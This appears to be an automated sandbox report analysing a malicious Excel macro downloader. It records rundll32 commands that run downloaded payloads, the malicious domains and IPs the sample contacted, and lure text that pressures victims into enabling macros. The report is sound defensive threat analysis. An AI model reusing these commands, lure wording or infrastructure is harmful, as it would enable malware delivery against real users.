Loading ...

Play interactive tourEdit tour

Analysis Report catalog-1908475637.xls

Overview

General Information

Sample Name:catalog-1908475637.xls
Analysis ID:412000
MD5:1de5671f987904abf6caa9aacb029d88
SHA1:42fdd77f2c2ae74a92c9ba9bd3ddcd2855b1ea06
SHA256:ae321f6cf2fff1dee8da9df91a49b43d4d24850362861929031b45d7d5399c6a
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document contains embedded VBA macros
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2380 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2324 cmdline: rundll32 ..\ikjcvesdv.ref,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 2332 cmdline: rundll32 ..\ikjcvesdv.ref1,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\ikjcvesdv.ref,DllRegisterServer, CommandLine: rundll32 ..\ikjcvesdv.ref,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2380, ProcessCommandLine: rundll32 ..\ikjcvesdv.ref,DllRegisterServer, ProcessId: 2324

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: catalog-1908475637.xlsVirustotal: Detection: 19%Perma Link
Source: catalog-1908475637.xlsReversingLabs: Detection: 14%
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: unknownHTTPS traffic detected: 108.167.180.164:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: unknownHTTPS traffic detected: 199.79.62.12:443 -> 192.168.2.22:49170 version: TLS 1.2

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe
Source: global trafficDNS query: name: iamihaveican.com
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 108.167.180.164:443
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 108.167.180.164:443
Source: Joe Sandbox ViewIP Address: 199.79.62.12 199.79.62.12
Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZJump to behavior
Source: rundll32.exe, 00000003.00000002.2116746958.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109992950.0000000001C10000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknownDNS traffic detected: queries for: iamihaveican.com
Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.0.drString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: 77EC63BDA74BD0D0E0426DC8F8008506.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: rundll32.exe, 00000003.00000002.2116746958.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109992950.0000000001C10000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2116746958.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109992950.0000000001C10000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2116998078.0000000001E17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2110131274.0000000001DF7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2116998078.0000000001E17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2110131274.0000000001DF7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000003.00000002.2116998078.0000000001E17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2110131274.0000000001DF7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2116998078.0000000001E17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2110131274.0000000001DF7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000003.00000002.2116746958.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109992950.0000000001C10000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2116998078.0000000001E17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2110131274.0000000001DF7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2116746958.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109992950.0000000001C10000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000004.00000002.2109992950.0000000001C10000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
Source: unknownHTTPS traffic detected: 108.167.180.164:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: unknownHTTPS traffic detected: 199.79.62.12:443 -> 192.168.2.22:49170 version: TLS 1.2

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable Editing 11 from the yellow bar above 12 13 Once You have Enable Editing, pleas ' RunDLL
Source: Screenshot number: 8Screenshot OCR: Enable Editing 11 1 from the yellow bar above 12 13 2 Once You have Enable Editing, please click
Source: Screenshot number: 8Screenshot OCR: Enable Content 14 , from the yellow bar above 15 D e 16 17 I 18 I WHY I CANNOT OPEN THIS DOCUME
Source: Document image extraction number: 5Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Content
Source: Document image extraction number: 5Screenshot OCR: Enable Content from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? You are using iOS or An
Source: Document image extraction number: 14Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Conte
Source: Document image extraction number: 14Screenshot OCR: Enable Content from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? w You are using IDS or
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: catalog-1908475637.xlsInitial sample: CALL
Source: catalog-1908475637.xlsInitial sample: CALL
Source: catalog-1908475637.xlsInitial sample: EXEC
Found abnormal large hidden Excel 4.0 Macro sheetShow sources
Source: catalog-1908475637.xlsInitial sample: Sheet size: 14919
Source: catalog-1908475637.xlsOLE indicator, VBA macros: true
Source: rundll32.exe, 00000003.00000002.2116746958.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109992950.0000000001C10000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
Source: classification engineClassification label: mal76.expl.evad.winXLS@5/11@2/2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\A4EE0000Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD9AB.tmpJump to behavior
Source: catalog-1908475637.xlsOLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\ikjcvesdv.ref,DllRegisterServer
Source: catalog-1908475637.xlsVirustotal: Detection: 19%
Source: catalog-1908475637.xlsReversingLabs: Detection: 14%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\ikjcvesdv.ref,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\ikjcvesdv.ref1,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\ikjcvesdv.ref,DllRegisterServerJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\ikjcvesdv.ref1,DllRegisterServerJump to behavior
Source: C:\Windows\System32\rundll32.exeAutomated click: OK
Source: C:\Windows\System32\rundll32.exeAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting21Path InterceptionProcess Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferIngress Tool Transfer1SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting21LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
catalog-1908475637.xls20%VirustotalBrowse
catalog-1908475637.xls15%ReversingLabsDocument-Office.Downloader.EncDoc

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
iamihaveican.com0%VirustotalBrowse
carriepatrick.com0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
iamihaveican.com
108.167.180.164
truefalseunknown
carriepatrick.com
199.79.62.12
truefalseunknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000003.00000002.2116998078.0000000001E17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2110131274.0000000001DF7000.00000002.00000001.sdmpfalse
    high
    http://www.windows.com/pctv.rundll32.exe, 00000004.00000002.2109992950.0000000001C10000.00000002.00000001.sdmpfalse
      high
      http://investor.msn.comrundll32.exe, 00000003.00000002.2116746958.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109992950.0000000001C10000.00000002.00000001.sdmpfalse
        high
        http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000003.00000002.2116746958.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109992950.0000000001C10000.00000002.00000001.sdmpfalse
          high
          http://www.icra.org/vocabulary/.rundll32.exe, 00000003.00000002.2116998078.0000000001E17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2110131274.0000000001DF7000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000003.00000002.2116998078.0000000001E17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2110131274.0000000001DF7000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          http://www.hotmail.com/oerundll32.exe, 00000003.00000002.2116746958.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109992950.0000000001C10000.00000002.00000001.sdmpfalse
            high
            http://investor.msn.com/rundll32.exe, 00000003.00000002.2116746958.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109992950.0000000001C10000.00000002.00000001.sdmpfalse
              high

              Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public

              IPDomainCountryFlagASNASN NameMalicious
              199.79.62.12
              carriepatrick.comUnited States
              394695PUBLIC-DOMAIN-REGISTRYUSfalse
              108.167.180.164
              iamihaveican.comUnited States
              46606UNIFIEDLAYER-AS-1USfalse

              General Information

              Joe Sandbox Version:32.0.0 Black Diamond
              Analysis ID:412000
              Start date:12.05.2021
              Start time:10:28:26
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 6m 39s
              Hypervisor based Inspection enabled:false
              Report type:full
              Sample file name:catalog-1908475637.xls
              Cookbook file name:defaultwindowsofficecookbook.jbs
              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
              Number of analysed new started processes analysed:7
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal76.expl.evad.winXLS@5/11@2/2
              EGA Information:Failed
              HDC Information:Failed
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Adjust boot time
              • Enable AMSI
              • Found application associated with file extension: .xls
              • Found Word or Excel or PowerPoint or XPS Viewer
              • Found warning dialog
              • Click Ok
              • Attach to Office via COM
              • Scroll down
              • Close Viewer
              Warnings:
              Show All
              • Excluded IPs from analysis (whitelisted): 192.35.177.64, 93.184.221.240, 205.185.216.42, 205.185.216.10
              • Excluded domains from analysis (whitelisted): wu.ec.azureedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, au.download.windowsupdate.com.hwcdn.net, apps.digsigtrust.com, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, wu.wpc.apr-52dd2.edgecastdns.net, apps.identrust.com, au-bg-shim.trafficmanager.net, wu.azureedge.net
              • Report size getting too big, too many NtDeviceIoControlFile calls found.

              Simulations

              Behavior and APIs

              No simulations

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              199.79.62.12catalog-949138716.xlsGet hashmaliciousBrowse
                catalog-949138716.xlsGet hashmaliciousBrowse
                  TCyJbxozes.xlsmGet hashmaliciousBrowse
                    TCyJbxozes.xlsmGet hashmaliciousBrowse
                      documents-1731157050.xlsmGet hashmaliciousBrowse
                        documents-1731157050.xlsmGet hashmaliciousBrowse
                          108.167.180.164catalog-949138716.xlsGet hashmaliciousBrowse
                            catalog-949138716.xlsGet hashmaliciousBrowse

                              Domains

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              carriepatrick.comcatalog-949138716.xlsGet hashmaliciousBrowse
                              • 199.79.62.12
                              catalog-949138716.xlsGet hashmaliciousBrowse
                              • 199.79.62.12
                              iamihaveican.comcatalog-949138716.xlsGet hashmaliciousBrowse
                              • 108.167.180.164
                              catalog-949138716.xlsGet hashmaliciousBrowse
                              • 108.167.180.164

                              ASN

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              PUBLIC-DOMAIN-REGISTRYUSINV74321.exeGet hashmaliciousBrowse
                              • 119.18.54.126
                              NAVTECO_R1_10_05_2021,pdf.exeGet hashmaliciousBrowse
                              • 116.206.104.92
                              #10052021.exeGet hashmaliciousBrowse
                              • 116.206.104.66
                              shipping docs and BL_pdf.exeGet hashmaliciousBrowse
                              • 208.91.198.143
                              PDF.9066721066.exeGet hashmaliciousBrowse
                              • 208.91.199.224
                              Payment Advice Note from 10.05.2021 to 608760.exeGet hashmaliciousBrowse
                              • 208.91.199.224
                              551f47ac_by_Libranalysis.xlsmGet hashmaliciousBrowse
                              • 162.222.225.153
                              551f47ac_by_Libranalysis.xlsmGet hashmaliciousBrowse
                              • 162.222.225.153
                              export of document 555091.xlsmGet hashmaliciousBrowse
                              • 103.21.58.29
                              RFQ-20283H.exeGet hashmaliciousBrowse
                              • 208.91.198.143
                              BTC-2021.exeGet hashmaliciousBrowse
                              • 208.91.199.225
                              invoice 85046.xlsmGet hashmaliciousBrowse
                              • 103.21.58.29
                              copy of invoice 4347.xlsmGet hashmaliciousBrowse
                              • 103.21.58.29
                              Copia de pago.exeGet hashmaliciousBrowse
                              • 208.91.199.225
                              NEW PI#001890576.exeGet hashmaliciousBrowse
                              • 208.91.199.223
                              bill 04050.xlsmGet hashmaliciousBrowse
                              • 103.21.59.208
                              PO 4500379537.exeGet hashmaliciousBrowse
                              • 208.91.199.225
                              catalog-949138716.xlsGet hashmaliciousBrowse
                              • 199.79.62.12
                              catalog-949138716.xlsGet hashmaliciousBrowse
                              • 199.79.62.12
                              B5Cg5YZIzp.exeGet hashmaliciousBrowse
                              • 208.91.199.223
                              UNIFIEDLAYER-AS-1USexport of purchase order 7484876.xlsmGet hashmaliciousBrowse
                              • 108.179.232.90
                              XM7eDjwHqp.xlsmGet hashmaliciousBrowse
                              • 162.241.190.216
                              QTFsui5pLN.xlsmGet hashmaliciousBrowse
                              • 108.179.232.90
                              15j1TCnOiA.xlsmGet hashmaliciousBrowse
                              • 192.185.115.105
                              e8eRhf3GM0.xlsmGet hashmaliciousBrowse
                              • 162.241.190.216
                              SOA PDF.exeGet hashmaliciousBrowse
                              • 192.185.226.148
                              djBLaxEojp.exeGet hashmaliciousBrowse
                              • 192.185.161.67
                              quotation 35420PDF.exeGet hashmaliciousBrowse
                              • 192.185.41.225
                              REQUEST FOR PRICE QUOTE - URGENT.pdf.exeGet hashmaliciousBrowse
                              • 162.241.24.59
                              551f47ac_by_Libranalysis.xlsmGet hashmaliciousBrowse
                              • 192.185.138.180
                              invoice and packing list.pdf.exeGet hashmaliciousBrowse
                              • 192.185.136.173
                              PO82055.exeGet hashmaliciousBrowse
                              • 192.185.161.67
                              export of document 555091.xlsmGet hashmaliciousBrowse
                              • 192.185.173.71
                              file.exeGet hashmaliciousBrowse
                              • 192.185.190.186
                              generated purchase order 6149057.xlsmGet hashmaliciousBrowse
                              • 162.241.55.9
                              file.exeGet hashmaliciousBrowse
                              • 192.185.186.178
                              fax 4044.xlsmGet hashmaliciousBrowse
                              • 192.185.173.71
                              scan of document 5336227.xlsmGet hashmaliciousBrowse
                              • 162.241.55.9
                              check 24994.xlsmGet hashmaliciousBrowse
                              • 192.185.86.147
                              generated check 8460.xlsmGet hashmaliciousBrowse
                              • 162.241.55.9

                              JA3 Fingerprints

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              7dcce5b76c8b17472d024758970a406bDHL AWB.xlsxGet hashmaliciousBrowse
                              • 199.79.62.12
                              • 108.167.180.164
                              export of purchase order 7484876.xlsmGet hashmaliciousBrowse
                              • 199.79.62.12
                              • 108.167.180.164
                              XM7eDjwHqp.xlsmGet hashmaliciousBrowse
                              • 199.79.62.12
                              • 108.167.180.164
                              QTFsui5pLN.xlsmGet hashmaliciousBrowse
                              • 199.79.62.12
                              • 108.167.180.164
                              15j1TCnOiA.xlsmGet hashmaliciousBrowse
                              • 199.79.62.12
                              • 108.167.180.164
                              e8eRhf3GM0.xlsmGet hashmaliciousBrowse
                              • 199.79.62.12
                              • 108.167.180.164
                              Purchase Agreement.docxGet hashmaliciousBrowse
                              • 199.79.62.12
                              • 108.167.180.164
                              551f47ac_by_Libranalysis.xlsmGet hashmaliciousBrowse
                              • 199.79.62.12
                              • 108.167.180.164
                              export of document 555091.xlsmGet hashmaliciousBrowse
                              • 199.79.62.12
                              • 108.167.180.164
                              generated purchase order 6149057.xlsmGet hashmaliciousBrowse
                              • 199.79.62.12
                              • 108.167.180.164
                              fax 4044.xlsmGet hashmaliciousBrowse
                              • 199.79.62.12
                              • 108.167.180.164
                              scan of document 5336227.xlsmGet hashmaliciousBrowse
                              • 199.79.62.12
                              • 108.167.180.164
                              check 24994.xlsmGet hashmaliciousBrowse
                              • 199.79.62.12
                              • 108.167.180.164
                              generated check 8460.xlsmGet hashmaliciousBrowse
                              • 199.79.62.12
                              • 108.167.180.164
                              export of check 209162.xlsmGet hashmaliciousBrowse
                              • 199.79.62.12
                              • 108.167.180.164
                              generated purchase order 045950.xlsmGet hashmaliciousBrowse
                              • 199.79.62.12
                              • 108.167.180.164
                              export of bill 896621.xlsmGet hashmaliciousBrowse
                              • 199.79.62.12
                              • 108.167.180.164
                              invoice 85046.xlsmGet hashmaliciousBrowse
                              • 199.79.62.12
                              • 108.167.180.164
                              copy of invoice 4347.xlsmGet hashmaliciousBrowse
                              • 199.79.62.12
                              • 108.167.180.164
                              scan of invoice 4366307.xlsmGet hashmaliciousBrowse
                              • 199.79.62.12
                              • 108.167.180.164

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              File Type:Microsoft Cabinet archive data, 59863 bytes, 1 file
                              Category:dropped
                              Size (bytes):59863
                              Entropy (8bit):7.99556910241083
                              Encrypted:true
                              SSDEEP:1536:Gs6cdy9E/ABKQPOrdweEz480zdPMHXNY/gLHfIZN:GNOqOrdDdJPAX1LHA/
                              MD5:15775D95513782F99CDFB17E65DFCEB1
                              SHA1:6C11F8BEE799B093F9FF4841E31041B081B23388
                              SHA-256:477A9559194EDF48848FCE59E05105168745A46BDC0871EA742A2588CA9FBE00
                              SHA-512:AC09CE01122D7A837BD70277BADD58FF71D8C5335F8FC599D5E3ED42C8FEE2108DD043BCE562C82BA12A81B9B08BD24B961C0961BF8FD3A0B8341C87483CD1E7
                              Malicious:false
                              Reputation:moderate, very likely benign file
